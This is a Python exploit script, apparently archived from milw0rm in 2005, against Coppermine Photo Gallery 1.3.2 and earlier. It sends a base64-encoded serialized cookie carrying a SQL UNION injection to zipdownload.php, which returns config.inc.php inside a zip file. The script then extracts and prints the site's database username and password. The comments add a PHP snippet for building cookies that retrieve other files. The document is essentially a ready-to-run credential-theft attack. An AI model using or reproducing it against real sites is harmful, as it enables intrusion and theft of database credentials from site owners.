65 lines
No EOL
1.7 KiB
Python
Executable file
65 lines
No EOL
1.7 KiB
Python
Executable file
# tested and approved /str0ke
|
|
|
|
#CPG Exploit
|
|
#File Retrieval by SQL Injection.
|
|
#By Default this exploit get the config.inc.php file which
|
|
#contains the db user/pass
|
|
#If you want to get another file you need to have the good cookie
|
|
#you can use this phpscript to get good cookie :
|
|
##<?
|
|
##$tab[]=$_GET['inj'];
|
|
##$val=base64_encode(serialize($tab));
|
|
##echo $val;
|
|
##?>
|
|
#
|
|
#By DiGiTAL_MiDWAY
|
|
|
|
|
|
import urllib2, sys
|
|
from urllib import urlencode
|
|
import zipfile
|
|
|
|
if(len(sys.argv)<2):
|
|
print 'usage : %s http://host/Path/ tableprefix[default : cpg132_ for v1.3.1 use cpg1d_]' % sys.argv[0]
|
|
sys.exit(0)
|
|
site=sys.argv[1]
|
|
try:
|
|
prefix=sys.argv[2]
|
|
except:
|
|
prefix='cpg132_'
|
|
|
|
print '''File Retrieval by SQL Injection for Coppermine Photo Gallery v<=1.3.2
|
|
by DiGiTAL_MiDWAY [digital.midway@gmail.com]'''
|
|
|
|
cook='YToxOntpOjA7czo1MToiJycpIFVOSU9OIFNFTEVDVCAnLi4vaW5jbHVkZS8nLCAnY29uZmlnLmluYy5waHAnIC8qIjt9'
|
|
# '') UNION SELECT filepath,file /*
|
|
|
|
req=urllib2.Request(site+'zipdownload.php')
|
|
req.add_header('Cookie', urlencode({prefix+'fav' : cook}))
|
|
|
|
zip=open('test.zip', 'wb')
|
|
print '[+]Opening WebPage'
|
|
try:
|
|
f=urllib2.urlopen(req).read()
|
|
except:
|
|
print '[+]Failed to opening website', sys.exc_info()
|
|
sys.exit(0)
|
|
zip.write(f)
|
|
zip.close()
|
|
monzip=zipfile.ZipFile('test.zip', 'r')
|
|
try:
|
|
conf=monzip.read('config.inc.php')
|
|
except:
|
|
print '[+]Exploit failed....'
|
|
sys.exit(0)
|
|
monzip.close()
|
|
conf=conf[conf.find("$CONFIG['dbuser'] =")+len("$CONFIG['dbuser'] ="):]
|
|
conf=conf[conf.find("'")+1:]
|
|
user=conf[:conf.find("'")]
|
|
conf=conf[conf.find("$CONFIG['dbpass'] =")+len("$CONFIG['dbpass'] ="):]
|
|
conf=conf[conf.find("'")+1:]
|
|
passwd=conf[:conf.find("'")]
|
|
print '[+]Exploit Succeed'
|
|
print '[+]User :', user, 'Pass :', passwd
|
|
|
|
# milw0rm.com [2005-11-13] |